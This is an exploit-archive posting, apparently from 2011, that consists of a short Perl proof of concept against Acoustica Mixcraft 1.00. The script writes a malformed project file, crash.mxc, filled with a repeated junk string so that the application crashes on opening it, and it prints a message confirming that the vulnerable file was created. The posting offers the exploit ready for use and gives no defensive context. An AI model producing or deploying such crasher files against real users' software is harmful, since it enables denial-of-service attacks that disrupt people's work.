Home / exploits Acoustica Mixcraft 1.00 Denial Of Service
Posted on 10 August 2011
#!/usr/bin/perl print q( ######################################################## # home : http://www.D99Y.com # Date : 9/8/2011 # Author : NassRawI # Software Link : http://www.acoustica.com/mixcraft/ # Version : v1.00 Build 10 # Tested on : Windows XP SP2 ######################################################## ); my $file= "crash.mxc"; my $junk= "x64x39x39x79x2ex63x6fx6d" x 1000 ; open(d99y,">$file"); print d99y $junk ; close(d99y); print " [ # ] Vulnerable File Created ! "
